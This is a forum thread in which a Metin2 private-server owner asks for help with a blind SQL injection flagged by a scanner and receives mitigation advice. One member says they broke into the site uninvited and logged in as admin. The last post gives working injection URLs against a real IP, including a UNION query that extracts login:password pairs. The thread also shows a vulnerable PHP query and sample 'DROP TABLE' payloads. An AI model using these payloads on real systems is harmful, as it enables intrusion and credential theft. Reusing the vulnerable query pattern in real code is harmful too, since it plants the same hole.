Jump to content

Site vulnerability. please help

minigutza
 Share

Recommended Posts

minigutza Collaborator

minigutza 47

Posted
Posted (edited)

Hello guys,

I have a problem :(

Someone access my databases from metin2 and i dont know how.

I dont have any keylogger in PC.

I scanned my website (hosted on pc with xampp), with Acunetix Web Vulnerability Scanner and seems to be just one huge vulnerability "Blind SQL Injection".

The software tells me how to resolv it but i dont where to start.

 

Could someone help me to resolv this vulnerability? Please. I attach 2 pictures to see what appears in Acunetix.

Thank you very much and i m sorry for my language mistakes.

 

20sg3mx.jpg

 

ve87yx.jpg

Edited by Metin2 Dev
Core X - External 2 Internal
Link to comment
Share on other sites
  • Replies 18
  • Created
  • Last Reply

Top Posters In This Topic

Popular Days

Top Posters In This Topic

Popular Days

Popular Posts

minigutza
minigutza

This is the hidden content, please Sign In or

minigutza
minigutza

Ok man. Thanks. Player.php: This is the hidden content, please Sign In 15bd8ad992e86fe1469711bd

Denis
Denis

Post your index.php here

minigutza Collaborator

minigutza 47

Posted
  • Author
Posted

I don't think so :(

In picture2 said "char .... and '3'='3

I think here is the problem.

How to solve the sql injection?

If I select "Detailed information" a lot of informations apears:

 

SQL injection mitigations

We believe that web application developers often simply do not think about "surprise inputs", but security people do (including the bad guys), so there are three broad approaches that can be applied here.

Sanitize the input

It's absolutely vital to sanitize user inputs to insure that they do not contain dangerous codes, whether to the SQL server or to HTML itself. One's first idea is to strip out "bad stuff", such as quotes or semicolons or escapes, but this is a misguided attempt. Though it's easy to point out some dangerous characters, it's harder to point to all of them.

The language of the web is full of special characters and strange markup (including alternate ways of representing the same characters), and efforts to authoritatively identify all "bad stuff" are unlikely to be successful.

Instead, rather than "remove known bad data", it's better to "remove everything but known good data": this distinction is crucial. Since - in our example - an email address can contain only these characters:

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
0123456789
@.-_+


There is really no benefit in allowing characters that could not be valid, and rejecting them early - presumably with an error message - not only helps forestall SQL Injection, but also catches mere typos early rather than stores them into the database.

Be aware that "sanitizing the input" doesn't mean merely "remove the quotes", because even "regular" characters can be troublesome. In an example where an integer ID value is being compared against the user input (say, a numeric PIN):

SELECT fieldlist
FROM table
WHERE id = 23 OR 1=1; -- Boom! Always matches!


In practice, however, this approach is highly limited because there are so few fields for which it's possible to outright exclude many of the dangerous characters. For "dates" or "email addresses" or "integers" it may have merit, but for any kind of real application, one simply cannot avoid the other mitigations.

Escape/Quotesafe the input

Even if one might be able to sanitize a phone number or email address, one cannot take this approach with a "name" field lest one wishes to exclude the likes of Bill O'Reilly from one's application: a quote is simply a valid character for this field.

One includes an actual single quote in an SQL string by putting two of them together, so this suggests the obvious - but wrong! - technique of preprocessing every string to replicate the single quotes:

SELECT fieldlist
FROM customers
WHERE name = 'Bill O''Reilly'; -- works OK


However, this naive approach can be beaten because most databases support other string escape mechanisms. MySQL, for instance, also permits ' to escape a quote, so after input of '; DROP TABLE users; -- is "protected" by doubling the quotes, we get:

SELECT fieldlist
FROM customers
WHERE name = '''; DROP TABLE users; --'; -- Boom!


The expression ''' is a complete string (containing just one single quote), and the usual SQL shenanigans follow. It doesn't stop with backslashes either: there is Unicode, other encodings, and parsing oddities all hiding in the weeds to trip up the application designer.

Getting quotes right is notoriously difficult, which is why many database interface languages provide a function that does it for you. When the same internal code is used for "string quoting" and "string parsing", it's much more likely that the process will be done properly and safely.

Some examples are the MySQL function mysql_real_escape_string() and perl DBD method $dbh->quote($value). These methods must be used.

Use bound parameters (the PREPARE statement)

Though quotesafing is a good mechanism, we're still in the area of "considering user input as SQL", and a much better approach exists: bound parameters, which are supported by essentially all database programming interfaces. In this technique, an SQL statement string is created with placeholders - a question mark for each parameter - and it's compiled ("prepared", in SQL parlance) into an internal form. Later, this prepared query is "executed" with a list of parameters:

Example in perl $sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = ?;");
$sth->execute($email);


Thanks to Stefan Wagner, this demonstrates bound parameters in Java:

Insecure version Statement s = connection.createStatement();
ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = "
+ formField); // *boom*


Secure version

PreparedStatement ps = connection.prepareStatement(
"SELECT email FROM member WHERE name = ?");
ps.setString(1, formField);
ResultSet rs = ps.executeQuery();


Here, $email is the data obtained from the user's form, and it is passed as positional parameter #1 (the first question mark), and at no point do the contents of this variable have anything to do with SQL statement parsing. Quotes, semicolons, backslashes, SQL comment notation - none of this has any impact, because it's "just data". There simply is nothing to subvert, so the application is be largely immune to SQL injection attacks.

There also may be some performance benefits if this prepared query is reused multiple times (it only has to be parsed once), but this is minor compared to the enormous security benefits. This is probably the single most important step one can take to secure a web application.

Limit database permissions and segregate users

In the case at hand, we observed just two interactions that are made not in the context of a logged-in user: "log in" and "send me password". The web application ought to use a database connection with the most limited rights possible: query-only access to the members table, and no access to any other table.

The effect here is that even a "successful" SQL injection attack is going to have much more limited success. Here, we'd not have been able to do the UPDATE request that ultimately granted us access, so we'd have had to resort to other avenues.

Once the web application determined that a set of valid credentials had been passed via the login form, it would then switch that session to a database connection with more rights.

It should go almost without saying that sa rights should never be used for any web-based application.

Use stored procedures for database access

When the database server supports them, use stored procedures for performing access on the application's behalf, which can eliminate SQL entirely (assuming the stored procedures themselves are written properly).

By encapsulating the rules for a certain action - query, update, delete, etc. - into a single procedure, it can be tested and documented on a standalone basis and business rules enforced (for instance, the "add new order" procedure might reject that order if the customer were over his credit limit).

For simple queries this might be only a minor benefit, but as the operations become more complicated (or are used in more than one place), having a single definition for the operation means it's going to be more robust and easier to maintain.

Note: it's always possible to write a stored procedure that itself constructs a query dynamically: this provides no protection against SQL Injection - it's only proper binding with prepare/execute or direct SQL statements with bound variables that provide this protection.

Isolate the webserver

Even having taken all these mitigation steps, it's nevertheless still possible to miss something and leave the server open to compromise. One ought to design the network infrastructure to assume that the bad guy will have full administrator access to the machine, and then attempt to limit how that can be leveraged to compromise other things.

For instance, putting the machine in a DMZ with extremely limited pinholes "inside" the network means that even getting complete control of the webserver doesn't automatically grant full access to everything else. This won't stop everything, of course, but it makes it a lot harder.

Configure error reporting

The default error reporting for some frameworks includes developer debugging information, and this cannot be shown to outside users. Imagine how much easier a time it makes for an attacker if the full query is shown, pointing to the syntax error involved.

This information is useful to developers, but it should be restricted - if possible - to just internal users.

Link to comment
Share on other sites
Ayaka Community Regular

Ayaka 291

Posted
Posted

simple. This program said that this test was successful with the index.php. But the sql statement is in another .php file which is included in your index.php. I dont know where the login sql query is but i think its in user/downloadmenu1.php,  inc/rights.inc.php or inc/functions.inc.php (or is there a login.php file anywhere?). Post this files and we can fix this like ATAG said.

 

it may be that this injection isnt the login because the GET variable is "char". do you have a ranklist in your website? i recommend to search after "char" in all php files and post these.

 

edit:// Got it. Found your site ... 

 

Post player.php in your /pages folder. And do that fast!

F E E L  -  T H E  -  A W E S O M E N E S S

Link to comment
Share on other sites
Ayaka Community Regular

Ayaka 291

Posted
Posted (edited)

You don't care at all?
Let me say that it was easy to hack your database. Dont worry im not one of those kids who release anything or do bullshit with it but you have to fix your site!

 

Logged in with admin account:

Oo2Od.png

 

post player.php now?

Edited by Metin2 Dev
Core X - External 2 Internal

F E E L  -  T H E  -  A W E S O M E N E S S

Link to comment
Share on other sites
Ayaka Community Regular

Ayaka 291

Posted
Posted 
<div class="col-2">
	<div class="content content-last">
		<div class="content-bg">
			<div class="content-bg-bottom">
<h2><?PHP echo $serverSettings['titel']; ?> - Prezentare caracter</h2>
<?php
$char = $_GET['char'];
$safe_char = mysql_real_escape_string($char);
include 'inc/config.inc.php';
	$db	= "player";
	mysql_connect(SQL_HOST, SQL_USER, SQL_PASS) OR
	die("ERROR: Connection failed. ".mysql_error());		
	mysql_select_db($db) OR
	die("ERROR: DB allready open. ".mysql_error());
$sql = "SELECT * FROM player WHERE name LIKE '$safe_char'";
 $ergebnis = mysql_query($sql);
$row = mysql_fetch_object($ergebnis);
$lvl = $row->level;
$skillgroup = $row->skill_group;
$class = $row->job;
$onlinemin = $row->playtime;
$exp = $row->exp;
$levelstep = $row->level_step;
$name = $row->name;

echo "<br/>
<center><img src="img/renders/$class.png"></center><br/>
   <div class="trenner_news">&nbsp;</div>
		<div align="left"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Nume </b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $name</div></td>

		<div align="left"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Nivel </b><td width="65%">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  $lvl</div></td>

		<div align="left"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Timp joc</b><td width="65%">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $onlinemin Minute</div></td>

		<div align="left"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EXP </b><td width="65%">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  $exp</div></td>

		<div align="left"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Trecere nivel</b><td width="65%">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ",$levelstep,"/4 </div></td>

";


	echo "

		<td width="65%"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Ras&#259; / Abilit&#259;&#355;i&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</b></td> ";

	
if($class == "0" or $class == "4")
{
	if($skillgroup == "1" and $skillgroup !="0")
	{
	echo "R&#259;zboinic Corp ";
	}
	elseif($skillgroup == "2" and $skillgroup !="0")
	{
	echo "R&#259;zboinic Mental ";
	}
	elseif($skillgroup == "0")
	{
	echo "R&#259;zboinic <small>(Nici o abilitate &#238;nv&#259;&#355;at&#259;)</small>";
	}	
}
elseif($class == "1" or $class == "5")
{
	if($skillgroup == "1" and $skillgroup !="0")
	{
	echo "Ninja Lam&#259; ";
	}
	elseif($skillgroup == "2" and $skillgroup !="0")
	{
	echo "Ninja Arc ";
	}
	elseif($skillgroup == "0")
	{
	echo "Ninja <small>(Nici o abilitate &#238;nv&#259;&#355;at&#259;)</small>";
	}
}
elseif($class == "2" or $class == "6")
{
	if($skillgroup == "1" and $skillgroup !="0")
	{
	echo "Sura Arme ";
	}
	elseif($skillgroup == "2" and $skillgroup !="0")
	{
	echo "Sura Magie Neagr&#259; ";
	}
	elseif($skillgroup == "0")
	{
	echo "Sura <small>(Nici o abilitate &#238;nv&#259;&#355;at&#259;)</small>";
	}
}
elseif($class == "3" or $class == "7")
{
	if($skillgroup == "1" and $skillgroup !="0")
	{
	echo "&#350;aman Dragon ";
	}
	elseif($skillgroup == "2" and $skillgroup !="0")
	{
	echo "&#350;aman Vindec&#259;tor ";
	}
	elseif($skillgroup == "0")
	{
	echo "&#350;aman <small>(Nici o abilitate &#238;nv&#259;&#355;at&#259;)</small>";
	}
}
else
{

echo "garnix";
}
echo "";

?>

<br/><br><div class="trenner_news">&nbsp;</div>
<div style="position=:center; margin-left:10px;"><a href="javascript: history.go(-1)" class="back-btn-news" rel="nofollow">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#206;napoi</a></div>
<div class="box-foot"></div>
</div>
</div>
</div>
<div class="shadow">&nbsp;</div>
</div>

F E E L  -  T H E  -  A W E S O M E N E S S

Link to comment
Share on other sites
Ayaka Community Regular

Ayaka 291

Posted
Posted

Site updated and safe  :) Now i can tell you how i did it. The sql injection was simple but it wasn*t easy to find the right inject beause error_reporting[0]; was enabled:

http://93.115.254.109:8888/index.php?s=player&char=NULL' or '1'='1' AND SUBSTRING(version(),1,1)=5 --%20
http://93.115.254.109:8888/index.php?s=player&char=-NULL' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat(login,':',password),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 from account.account WHERE account.login='protectedidd' --%20

 

  • Love 1

F E E L  -  T H E  -  A W E S O M E N E S S

Link to comment
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
 Share
Go to topic listing

Announcements



×
×
  • Create New...

Important Information

Terms of Use / Privacy Policy / Guidelines / We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.